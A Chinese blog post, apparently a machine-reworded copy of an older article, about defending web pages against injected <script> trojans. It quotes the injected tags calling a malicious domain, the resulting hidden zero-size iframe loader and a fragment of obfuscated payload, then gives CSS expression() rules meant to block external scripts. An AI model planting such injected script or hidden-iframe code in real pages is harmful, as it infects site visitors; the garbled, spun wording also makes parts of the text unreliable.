处理所有网页页面木马的技能

日期:2021-01-20 类型:科技新闻 

关键词:如何制作微信小游戏,微信游戏小程序,公众号游戏,h5小游戏模板,小程序游戏源码


還是挂马难题,这段時间,我逐渐觉得工作压力,头大,根据QQ或MSN加我的人愈来愈多,我近期自身的工作中原本就忙得不亦乐乎。哎,想一想,還是要抽时间来来帮帮大伙儿。
前没多久《1行编码处理iframe挂马(包括服务器端引入、顾客端ARP引入等)》获得了许多盆友的认同,这的确是个避避风雨的好方法。可如今挂网马的方法真如我所料地更改了,如今时兴挂<script>木马,汗了,看了几个网友的网站都被这样了——网页页面的顶部或底部再加了:
留意,下列详细地址含有木马,请不必随便浏览:
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>
<script src=http://vccd.cn></script>

汗死,1连插进了N个1样的<script>标识。偶的电脑上甚么补钉都打了,立即浏览这个http://vccd.cn(或立即应用迅雷免费下载),额~ 现形了:
document.write("<div style='display:none'>")
document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write("</div>")

又用迅雷免费下载http://a.158dm.com/b1.htm这个文档,1看,乱78糟的JS编号,汗,但是寻找了1个相近QQ号的数据,立即加加看,汗,随后是技术专业出示网马的机构,哎,甚么世间。还收费蛮高滴呢!
...
var Kfqq, Qqs="[color=Magenta]784378237[/color]"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面也有N个统计分析的JS编码)

对于上面的状况,我也不可以白白瞧着无论,想一想方法吧,弟兄。喝了碗绿豆粥,糖放得蛮多的,好喝。方法想起了。略微剖析就得出了回答。大伙儿看来看,<script>木马的特性是甚么:
<script src=http://vccd.cn></script>
对了,script木马的src1般全是外域的,也便是src是以http打头的,假如是自身网站的script1般都无需再加http;再看看木马的原型,里边還是輸出的iframe、JS编码或是别的<object>编码,无论这么多,来是多少杀是多少。
来跟我写CSS,11搞定它们,我写了5种不一样的计划方案,大伙儿来检测1下哈:
处理计划方案1
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行编码是处理挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被取得成功防护!'):'');}

基本原理:将<script>标识的src拿出来变为小写,再看是否以“http”开始的外域JS脚本制作文档,假如是,则网页页面內容清空并写出“木马被取得成功防护!”。反之一切正常显示信息。
缺陷:访客没法看到被感柒了<script>木马的网页页面。
处理计划方案2
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

基本原理:将外域的JS文档的document.write()应用document.close()强制性关掉。木马內容都还没来得及写完,仅有一部分被强制性缓存文件輸出了,剩余的不容易再写了。
上1页12 下1页 阅读文章全文
上一篇:css 超出宽度的文本显示信息点点 返回下一篇:没有了